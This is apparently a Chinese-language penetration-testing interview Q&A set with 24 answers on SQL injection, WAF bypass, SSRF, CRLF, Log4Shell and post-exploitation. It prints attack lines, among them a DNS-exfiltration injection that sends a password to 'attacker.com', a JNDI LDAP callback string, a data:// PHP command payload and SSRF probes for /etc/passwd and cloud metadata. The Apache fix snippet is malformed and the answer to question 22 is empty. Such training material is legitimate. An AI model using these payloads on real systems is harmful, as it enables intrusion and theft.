2025年渗透测试面试题总结-101（题目+回答）

安全领域各种资源，学习文档，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具，欢迎关注。

目录

[1. Burpsuite修改返回码方法](#1. Burpsuite修改返回码方法)

[2. 脚本编写经验](#2. 脚本编写经验)

[3. PHP代码能力](#3. PHP代码能力)

[4. 代码审计思路](#4. 代码审计思路)

[5. DNS注入](#5. DNS注入)

[6. 中间件解析漏洞](#6. 中间件解析漏洞)

[7. 渗透项目方向](#7. 渗透项目方向)

[8. EXP编写能力](#8. EXP编写能力)

[9. JS调试PHP可行性](#9. JS调试PHP可行性)

[10. 后渗透实战经验](#10. 后渗透实战经验)

[11. MySQL过滤IN的注入绕过](#11. MySQL过滤IN的注入绕过)

[12. 真实IP查找与邮件绕过](#12. 真实IP查找与邮件绕过)

[13. MySQL 5.0 vs 5.5区别](#13. MySQL 5.0 vs 5.5区别)

[14. WAF绕过方法](#14. WAF绕过方法)

[15. Oracle注入识别](#15. Oracle注入识别)

[16. 文件包含与SSRF共存](#16. 文件包含与SSRF共存)

[17. 最新漏洞分析](#17. 最新漏洞分析)

[18. PHP伪协议](#18. PHP伪协议)

[19. Sleep盲注延迟不符原因](#19. Sleep盲注延迟不符原因)

[20. Fastjson漏洞](#20. Fastjson漏洞)

[21. Apache最新解析漏洞](#21. Apache最新解析漏洞)

[22. MySQL报错注入函数](#22. MySQL报错注入函数)

[23. SSRF漏洞](#23. SSRF漏洞)

[24. CRLF漏洞](#24. CRLF漏洞)

1、Burpsuit怎么去修改返回码？
2、你写过脚本吗？写过哪些？
3、PHP代码功底怎么样？
4、你代码审计的思路是怎么样的？
5、什么是DNS注入？
6、常见的中间件解析漏洞？
7、项目上做过哪些方面的渗透？
8、会写exp吗？
9、会写JS调试PHP吗？
10、有后渗透实战经验吗？如何进行后渗透?（注意一下渗透岗必问，面了几家都问了）
11、mysql,正则匹配过滤in后怎么注入?
12、怎么查看真实ip？怎么绕过云cloud邮件服务器。
13、mysql 5、5版本和5、0版本的区别
14、怎么绕waf？有哪些方法去饶waf?哪些分块传输能绕waf，有什么优势。
15、怎么识别ORACLE数据库的注入？
16、文件包含和ssrf会同时存在吗？
17、有没有分析过最新的漏洞，调试过相应的代码？
18、php伪协议了解多少？
19、mysql执行盲注sleep4s为什么回显回来是20s
20、了解fastjson相关漏洞吗？
21、apache最新的解析漏洞是什么？
22、mysql报错注入有哪些常用的函数？
23、什么是SSRF，怎么去判断这个点有SSRF漏洞？SSRF有哪些利用方法？
24、什么是CRLF，怎么去利用？

1. Burpsuite修改返回码方法

步骤：

• Proxy拦截响应 → 捕获目标HTTP响应
• 手动修改 ：在Proxy「Intercept」标签页修改Status Code（如200→404）
• 自动修改（Repeater）：在Repeater中直接编辑响应头
• 规则匹配（Match & Replace） ：
  Proxy → Options → Match and Replace 添加规则：
  • 类型：Response Header
  • 匹配：HTTP/1.1 403 Forbidden
  • 替换：HTTP/1.1 200 OK

---

2. 脚本编写经验

常用脚本类型：

• 自动化渗透：SQL注入模糊测试脚本（Python + requests库）
• 漏洞利用：Fastjson反序列化EXP（Java序列化数据构造）
• 流量处理：WAF绕过分块编码转换工具（Python）
• 信息收集：子域名爆破（异步协程架构）

---

3. PHP代码能力

• 代码审计 ：熟悉危险函数（eval(), system(), unserialize()）及过滤机制
• 漏洞利用 ：
  • 反序列化POP链构造
  • 文件包含伪协议利用（php://filter/convert.base64-encode/resource=index.php ）
• 安全开发 ：实现安全的参数过滤（如filter_var()验证+预处理）

---

4. 代码审计思路

Mermaid

关键点：

• 全局搜索$_GET/$_POST/$_COOKIE接收点
• 检查过滤函数（addslashes(), htmlspecialchars()）是否全覆盖
• 分析逻辑漏洞（如权限校验缺失、二次注入）

---

5. DNS注入

• 原理：利用DNS解析过程外带敏感数据（仅适用于无回显场景）
• Payload示例 ：
  ' AND (SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM users LIMIT 1), '.attacker.com\\test')))--+
• 工具 ：dnslog.cn 或自建DNS服务器监控解析记录

---

6. 中间件解析漏洞

中间件	漏洞场景	利用方式
IIS 6.0	分号截断	/x.asp;.jpg 执行ASP代码
Apache	多后缀解析	/x.php.jpg 解析为PHP
Nginx	%00空字节截断	/x.jpg%00.php (PHP<5.3.4)
Tomcat	PUT方法+文件上传	上传JSP马

---

7. 渗透项目方向

• Web应用：OA系统逻辑漏洞（越权/支付绕过）
• 内网渗透：域环境突破（Kerberoasting+横向移动）
• 云安全：AWS S3桶策略配置错误导致数据泄露
• 移动端：APK反编译硬编码密钥泄露

---

8. EXP编写能力

• 场景：编写Apache Log4j2 JNDI注入利用工具

• 关键步骤 ：

  Python

  # 构造恶意LDAP响应 payload = '${jndi:ldap://attacker:1389/Exploit}' # 启动LDAP服务反射恶意类 server = LdapServer(ref=Exploit.class)

---

9. JS调试PHP可行性

• 否：JS运行于客户端，PHP在服务端执行
• 替代方案 ：
  • 浏览器控制台调试AJAX与PHP交互
  • Node.js 模拟HTTP请求测试接口

---

10. 后渗透实战经验

后渗透流程：

1. 权限维持 ：
   • Windows：注册计划任务/服务
   • Linux：SSH公钥写入 + 隐藏进程（libprocesshider）
2. 信息收集 ：
   • 域环境：BloodHound分析拓扑关系
   • 凭证获取：Mimikatz抓取密码/Token窃取
3. 横向移动 ：
   • PTH攻击（Pass-the-Hash）
   • SMB共享探测（crackmapexec）
4. 数据外带 ：DNS隧道（dnscat2）或ICMP隐蔽信道

---

11. MySQL过滤IN的注入绕过

绕过方法：

• 等价替换 ：
  WHERE id NOT IN (1,2) → WHERE id=1 OR id=2
• 正则注入 ：
  ' OR (SELECT 1 REGEXP IF(SUBSTR(database(),1,1)='a',1,0))--+
• JOIN拼接 ：
  UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b--+

---

12. 真实IP查找与邮件绕过

查找真实IP：

• 历史DNS记录（SecurityTrails）
• 邮件头分析（Received-SPF字段）
• 全球Ping测试（不同地区DNS解析结果）

邮件绕过方法：

• 伪造X-Forwarded-For头
• 使用第三方中继服务（如SendGrid）

---

13. MySQL 5.0 vs 5.5区别

特性	MySQL 5.0	MySQL 5.5
存储引擎	MyISAM默认	InnoDB成为默认
性能优化	无分区表优化	支持分区表性能提升
注入相关	information_schema 不完善	完整元数据支持

---

14. WAF绕过方法

分块传输绕WAF：

• 方法 ：使用Transfer-Encoding: chunked + 畸形分块（如0x0a结尾）
• 优势：绕过基于正则的请求体检测
• 工具 ：Burp插件（Chunked Coding Converter）

其他绕过技术：

• 注释混淆：/*!SELECT*/
• 大小写/空白符：SeLeCt\t1
• 溢出攻击：超长URL触发WAF规则失效

---

15. Oracle注入识别

特征判断：

• 错误回显：ORA-XXXXX

• 函数探测：

  Sql

  ' AND 1=utl_inaddr.get_host_name('test')-- -- 正常则可能是Oracle

• 时间盲注：DBMS_PIPE.RECEIVE_MESSAGE('',5) 导致5秒延迟

---

16. 文件包含与SSRF共存

• 场景 ：
  include($_GET['file']) 参数为 http://internal/secret.conf
• 利用链 ：
  文件包含 → 触发SSRF读取内网文件 → 获取敏感配置

---

17. 最新漏洞分析

• 案例 ：Log4Shell（CVE-2021-44228）
  • 调试过程：分析JndiLookup类的lookup()方法
  • 利用链：log.info("${jndi:ldap://attacker}") → 触发恶意类加载

---

18. PHP伪协议

协议	用途	示例
php://filter	读取源码/编码转换	php://filter/read=convert.base64-encode/resource=index.php
phar://	触发反序列化	phar:///path/to/exploit.phar/test.txt
data://	直接执行代码	data://text/plain,<?php system('id');?>

---

19. Sleep盲注延迟不符原因

• 可能原因 ：
  • 网络延迟（尤其跨地域数据库）
  • 数据库并发查询阻塞
  • max_execution_time限制（PHP超时中断）
  • MySQL查询缓存干扰

---

20. Fastjson漏洞

原理 ：autotype开启时反序列化任意类

• 关键漏洞 ：
  • CVE-2017-18349：利用TemplatesImpl执行代码
  • CVE-2022-25845：绕过黑名单加载恶意类
• 防御 ：升级至≥1.2.83 + 关闭autotype

---

21. Apache最新解析漏洞

• CVE-2023-25690 ：

  • 漏洞点：mod_proxy错误处理畸形请求
  • 影响：可导致RCE（需特定模块组合）

• 配置修复 ：

  Apache

  ProxyRequests Off Proxy via Block

---

22. MySQL报错注入函数

Sql

---

23. SSRF漏洞

定义 ：服务端请求伪造（攻击内网资源）
检测方法：

• 尝试访问http://localhost 或 file:///etc/passwd
• DNS Rebinding测试（如http://<随机子域>.attacker.com ）

利用方式：

• 内网端口扫描（dict://127.0.0.1:3306）
• 云元数据窃取（http://169.254.169.254）
• Redis未授权访问利用（gopher://协议）

---

24. CRLF漏洞

原理 ：注入\r\n控制HTTP头或响应体
检测 ：

提交参数：?url=xxx%0d%0aSet-Cookie:test=1
利用：

• 构造虚假响应头（缓存投毒）
• 会话固定（Set-Cookie: sessionid=attacker_control）
• XSS组合攻击：
  %0d%0aContent-Length:35%0d%0a%0d%0a<script>alert(1)</script>